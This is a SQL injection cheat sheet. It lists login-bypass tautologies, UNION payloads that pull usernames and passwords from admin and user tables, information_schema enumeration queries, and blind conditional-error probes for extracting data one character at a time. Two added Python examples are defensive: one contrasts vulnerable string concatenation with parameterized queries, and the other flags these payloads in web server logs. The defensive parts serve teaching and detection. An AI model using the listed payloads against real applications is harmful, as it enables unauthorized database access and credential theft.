1.1 Useful examples
Always works (tautologies that make the WHERE clause true):
'=' 'OR 1=1 'OR a=a 'OR' 'OR=' 'OR"=" 'OR'=" 'OR '=" 'OR "=' 'OR =' 'OR '= 'OR "= 'OR ="
Currently a newer type is in fashion: UNION payloads, which require knowing at least a little about the shape of the query, or guessing it:
UNION ALL SELECT pseudo,password FROM admins
UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR 1=1# AND password='OR ="
UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR "=' AND password='OR "='
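The reason the tautologies above work is that the application pastes user input into the SQL text, so the quote closes the literal and the rest is parsed as syntax. The following is an added example (not from the original page) showing the vulnerable concatenation pattern beside its parameterized replacement, run against a constructed in-memory SQLite table; the table contents and the login names are made up for the demonstration, and the quote-balanced tautology is used because SQLite has no `#` comment syntax.

```python
import sqlite3

# Constructed sample data for this example: a throwaway in-memory users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("JohnDoe", "s3cret"), ("alice", "hunter2")])
    return conn

def login_vulnerable(conn, login, password):
    """Builds the query by string concatenation, so the user's text is
    parsed as SQL syntax. This is the pattern the tautologies above rely on."""
    sql = ("SELECT login FROM users "
           f"WHERE login='{login}' AND password='{password}'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, login, password):
    """Same query with bound parameters: values never reach the SQL parser
    as syntax, so a quote in the input is just a quote character."""
    sql = "SELECT login FROM users WHERE login=? AND password=?"
    return [row[0] for row in conn.execute(sql, (login, password))]

# One of the tautologies listed above, in its quote-balanced spaced form.
TAUTOLOGY = "' OR ''='"

def demo():
    """Run both implementations with an honest password and with the tautology."""
    conn = make_db()
    return {
        "honest_vulnerable": login_vulnerable(conn, "JohnDoe", "s3cret"),
        "injected_vulnerable": login_vulnerable(conn, "JohnDoe", TAUTOLOGY),
        "honest_safe": login_safe(conn, "JohnDoe", "s3cret"),
        "injected_safe": login_safe(conn, "JohnDoe", TAUTOLOGY),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the tautology as password, the concatenated query becomes `... AND password='' OR ''=''`, and because AND binds tighter than OR the trailing comparison makes every row match, so the vulnerable function returns every account. The parameterized version compares the literal nine-character string against the stored password and returns nothing.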
Show the databases:
SHOW DATABASES
Show the tables:
SHOW TABLES [FROM $DATABASE]
Show the columns:
SHOW COLUMNS FROM $TABLE
Determine the number of fields:
' ORDER BY X #
Count the number of columns:
SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '$TABLE'
Union select:
' AND 1=0 UNION SELECT 1,2,3,4 #
Number of tables:
' AND 1=0 UNION SELECT 1,(SELECT COUNT(*) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #
List the tables:
' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #
List the fields of a table (0x7573657273 is the hex encoding of 'users'):
(SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name=0x7573657273 AND table_schema=DATABASE()),3,4 #
Find JohnDoe's password:
' AND 1=0 UNION SELECT 1,(SELECT password FROM users WHERE login='JohnDoe'),3,4 #
Retrieve the accounts:
' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(login,':',password,'\n') FROM users),3,4 #
Conditional errors (the inner SELECT returns two rows, which raises a "Subquery returns more than 1 row" error only when the condition is true):
(SELECT IF(Condition,(SELECT 0 UNION ALL SELECT 0),0))
(SELECT IF((1<0),(SELECT 0 UNION ALL SELECT 0),0))
ASCII code: ORD(character)
Extract a character: SUBSTRING(text,start,1) (positions start at 1)
Testing the version in blind SQL injection (53 is the ASCII code of '5'):
(SELECT IF( ORD(SUBSTRING(@@VERSION,1,1))=53,(SELECT 0 UNION ALL SELECT 0),0))
=> Version 5.X
Retrieving the first character of the first table:
(SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)
(SELECT IF( (SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)<128,(SELECT 0 UNION ALL SELECT 0),0))
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
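The enumeration and blind-probe payloads above leave recognisable traces in web server logs: UNION ... SELECT, references to information_schema, @@VERSION checks and ORD(SUBSTRING(...)) character probes, usually URL-encoded. The following is an added example (not from the original page) of detection logic that URL-decodes access-log lines and flags those indicator families; the log lines are constructed for the demonstration and the indicator names are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicator families drawn from the payloads listed on this page.
# Requests are URL-decoded and lower-cased before matching.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "version_probe": re.compile(r"@@version"),
    "char_probe": re.compile(r"\bord\s*\(\s*substring\s*\("),
    "tautology": re.compile(r"'\s*or\s*(?:1\s*=\s*1|'[^']*'\s*=\s*')"),
}

def sqli_indicators(line):
    """Return the sorted indicator names found in one log line."""
    decoded = unquote_plus(line).lower()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))

def scan(lines):
    """Return (line number, indicators) for every line that matched something."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = sqli_indicators(line)
        if hits:
            results.append((number, hits))
    return results

# Constructed access-log lines (not from the page). Lines 2 and 3 carry
# URL-encoded forms of the UNION table listing and the blind version probe above.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=42%27+AND+1%3D0+UNION+SELECT+1'
    '%2C%28SELECT+GROUP_CONCAT%28table_name%29+FROM+information_schema.TABLES%29%2C3%2C4+%23 '
    'HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=42+AND+%28SELECT+IF%28ORD%28'
    'SUBSTRING%28%40%40VERSION%2C1%2C1%29%29%3D53%2C%28SELECT+0+UNION+ALL+SELECT+0%29%2C0%29%29 '
    'HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /login.php HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, hits in scan(LOG_LINES):
        print(f"line {number}: {', '.join(hits)}")
```

Decoding before matching matters because every payload on this page would otherwise hide behind %27, %28 and %40 escapes; a 500 status paired with the char_probe or version_probe indicator is a typical sign of the conditional-error technique described above being iterated against the application.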